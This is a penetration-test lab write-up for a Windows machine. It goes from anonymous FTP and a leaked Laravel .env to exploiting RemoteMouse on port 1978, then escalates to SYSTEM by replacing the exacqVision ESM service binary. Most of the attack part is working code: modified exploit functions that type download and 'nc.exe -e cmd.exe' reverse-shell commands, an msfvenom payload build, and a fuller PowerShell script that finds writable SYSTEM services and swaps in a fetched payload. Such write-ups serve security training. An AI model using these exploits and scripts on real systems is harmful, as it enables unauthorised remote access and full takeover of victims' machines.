
89 ESM Writeup

1 | Page
.89 Machine

Open ports

    21    FTP (FileZilla)
    80    Apache, exacqVision ESM
    135
    139
    445
    1978  RemoteMouse
    1979
    1980
    8090  Apache 2.4.43, /project/

21: anonymous FTP login is allowed.

There is a project.zip you can download.

Zip file contains:

.editorconfig

On 8090, using the name of the zip file as the path:

192.168.xx.89:8090/project/

We tried to enumerate it and found a Laravel app.

Folders:

The .env file contains the Laravel APP_KEY.
(We tried msf and decrypting/exploiting with the APP_KEY from .env, but it did not work.)

Also on

/storage/framework/sessions/
we found session files.

But they are useless.

We noticed that port 1978 is open. We googled it and found that the port is used by RemoteMouse:

https://wintelguy.com/port-search/1978

Or simply:

nmap -n -v -p 1978 192.168.xx.89

the response is SIN 15win nop nop 300

We found an exploit for RemoteMouse:

https://www.exploit-db.com/exploits/46697

It needs some modifications to work properly.

The modified part is the PopCalc function: instead of typing calc.exe, it types a PowerShell reverse-shell one-liner.

Ref:

https://hackersinterview.com/oscp/reverse-shell-one-liners-oscp-cheatsheet/

Add your IP and port to the one-liner.

Open a terminal and start a listener:

nc -lnvp 445

Run the exploit.

Then you have a shell as the user.

Alternative (the reliable, GOLDEN route): do it with nc.exe instead of the PowerShell one-liner.

First upload nc.exe by editing PopCalc so that it types a PowerShell download command:

    def PopCalc(ip):
        # MoveMouse, MousePress, SendString, mouse and sleep are the helpers/imports
        # already defined in exploit 46697; only the body of PopCalc is changed.
        # Move the pointer to the bottom-left corner (Start button), click, then type
        # into the Start search box and press Enter to open PowerShell.
        MoveMouse(-5000,3000,ip)
        MousePress(mouse.leftClick,ip)
        sleep(2)
        SendString('''powershell''',ip)
        sleep(3)
        SendString("\n",ip)
        sleep(5)
        # Raw string: a bare \U in C:\Users is otherwise parsed as a unicode escape
        # by Python 3 and the script refuses to start.
        SendString(r'''Invoke-WebRequest -Uri 'http://192.168.101.13/nc.exe' -OutFile C:\Users\Public\nc.exe''',ip)
        sleep(1)
        SendString("\n",ip)
        sleep(1)
        print("SUCCESS! nc.exe download command typed on target",ip)

Then edit the exploit again so that it runs the uploaded nc.exe back to your listener (start nc -lnvp 1212 on the attacking machine first):

    def PopCalc(ip):
        MoveMouse(-5000,3000,ip)
        MousePress(mouse.leftClick,ip)
        sleep(1)
        SendString('''cmd.exe''',ip)
        sleep(1)
        SendString("\n",ip)
        sleep(1)
        # Raw string for the same reason as above (\U in C:\Users).
        SendString(r"C:\Users\Public\nc.exe 192.168.101.13 1212 -e cmd.exe",ip)
        sleep(1)
        SendString("\n",ip)
        sleep(1)
        print("SUCCESS! nc.exe reverse shell command typed on target",ip)

Or

Privesc:

Enumerating the installed software reveals a vulnerable service.

exacqVision ESM is likely vulnerable.

It is on port 8090.

We found the version on the login form:

exacqVision ESM 5.12.2

We found the privesc exploit

1. Generate a malicious .exe on the attacking machine (LHOST must be your own attacking IP; elsewhere in this writeup that is 192.168.101.13, so adjust the value below)

    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.163 LPORT=443 -f exe > /var/www/html/enterprisesystemmanager.exe

2. Set up a listener and make sure Apache is running on the attacking machine

    nc -nlvvp 443
    service apache2 start

3. Download the malicious .exe on the victim machine

    powershell Invoke-WebRequest -Uri 'http://192.168.101.13/enterprisesystemmanager.exe' -OutFile C:\Users\Public\enterprisesystemmanager.exe

4. Rename the original C:\exacqVisionEsm\EnterpriseSystemManager\enterprisesystemmanager.exe to enterprisesystemmanager.bak (a running executable can be renamed on Windows even though it cannot be deleted, which is why it is renamed rather than overwritten)

    ren C:\exacqVisionEsm\EnterpriseSystemManager\enterprisesystemmanager.exe enterprisesystemmanager.bak

5. Copy/move the downloaded enterprisesystemmanager.exe into

    C:\exacqVisionEsm\EnterpriseSystemManager\

6. Restart the victim machine so the service launches the replaced binary as SYSTEM (add /t 0 to skip the default delay)

    shutdown /r

The listener from step 2 must still be running, and its port must match the LPORT baked into the payload (443 above; a listener on port 80 would not catch this shell).

7. A reverse shell opens on the attacking machine

    C:\Windows\system32>whoami
    whoami
    nt authority\system
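The file swap in steps 3 to 5, as an added PowerShell example (ours, not from the writeup or from the exploit it follows). Steps 4 and 5 only work because the current user can write to the service's install directory, so the script first lists every service that would re-launch as LocalSystem from a directory the current user can write to, then performs the rename-and-copy with a .bak backup and a staging step so a failed download never leaves the service without a binary. The payload URL and the binary path are the values used elsewhere in this writeup and are assumptions here.

```powershell
# Added example, not part of the original writeup or the exploit-db entry it follows.
# Assumed values (ours): payload hosted at http://192.168.101.13/enterprisesystemmanager.exe,
# target binary C:\exacqVisionEsm\EnterpriseSystemManager\enterprisesystemmanager.exe.

function Test-DirectoryWritable {
    param([Parameter(Mandatory)][string]$Dir)
    # Create and delete a random probe file: rename + copy (steps 4 and 5) need
    # exactly this directory-level write access, not write access to the exe itself.
    $probe = Join-Path $Dir ([System.IO.Path]::GetRandomFileName())
    try {
        New-Item -ItemType File -Path $probe -ErrorAction Stop | Out-Null
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Get-ServiceBinaryPath {
    param([Parameter(Mandatory)][string]$PathName)
    # Win32_Service.PathName may be quoted and may carry arguments; keep only the exe.
    # An unquoted path containing spaces is truncated at the first space here, which
    # is the separate "unquoted service path" bug and is not what this writeup uses.
    if ($PathName.StartsWith('"')) { return $PathName.Split('"')[1] }
    return ($PathName -split '\s+')[0]
}

function Find-ReplaceableSystemServices {
    # Every service that runs as LocalSystem from a directory we can write to.
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.StartName -eq 'LocalSystem' -and $_.PathName } |
        ForEach-Object {
            $exe = Get-ServiceBinaryPath $_.PathName
            $dir = Split-Path -Parent $exe
            if ((Test-Path -LiteralPath $exe) -and (Test-DirectoryWritable $dir)) {
                [PSCustomObject]@{
                    Service   = $_.Name
                    Binary    = $exe
                    StartMode = $_.StartMode   # Auto: a reboot relaunches it as SYSTEM
                    State     = $_.State
                }
            }
        }
}

function Invoke-ServiceBinarySwap {
    param(
        [Parameter(Mandatory)][string]$Binary,
        [Parameter(Mandatory)][string]$PayloadUrl
    )
    $dir = Split-Path -Parent $Binary
    if (-not (Test-DirectoryWritable $dir)) { throw "No write access to $dir" }
    $backup = [System.IO.Path]::ChangeExtension($Binary, '.bak')
    if (Test-Path -LiteralPath $backup) { throw "Backup already exists, refusing to overwrite: $backup" }

    # Stage the payload outside the service directory first.
    $staged = Join-Path $env:TEMP ([System.IO.Path]::GetFileName($Binary))
    Invoke-WebRequest -Uri $PayloadUrl -OutFile $staged -UseBasicParsing

    # A running exe can be renamed but not deleted on Windows, hence rename + copy.
    Rename-Item -LiteralPath $Binary -NewName ([System.IO.Path]::GetFileName($backup))
    Copy-Item -LiteralPath $staged -Destination $Binary
    Remove-Item -LiteralPath $staged -Force
    return [PSCustomObject]@{ Replaced = $Binary; Backup = $backup }
}

# Usage (values assumed, see the lead-in):
Find-ReplaceableSystemServices | Format-Table -AutoSize
Invoke-ServiceBinarySwap `
    -Binary 'C:\exacqVisionEsm\EnterpriseSystemManager\enterprisesystemmanager.exe' `
    -PayloadUrl 'http://192.168.101.13/enterprisesystemmanager.exe'
# Then, with nc listening on the payload's LPORT:  shutdown /r /t 0
```

To restore the box afterwards, delete the payload copy and rename the .bak back to .exe; the probe file created by Test-DirectoryWritable is removed immediately but its creation still shows up in file-system auditing if that is enabled.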
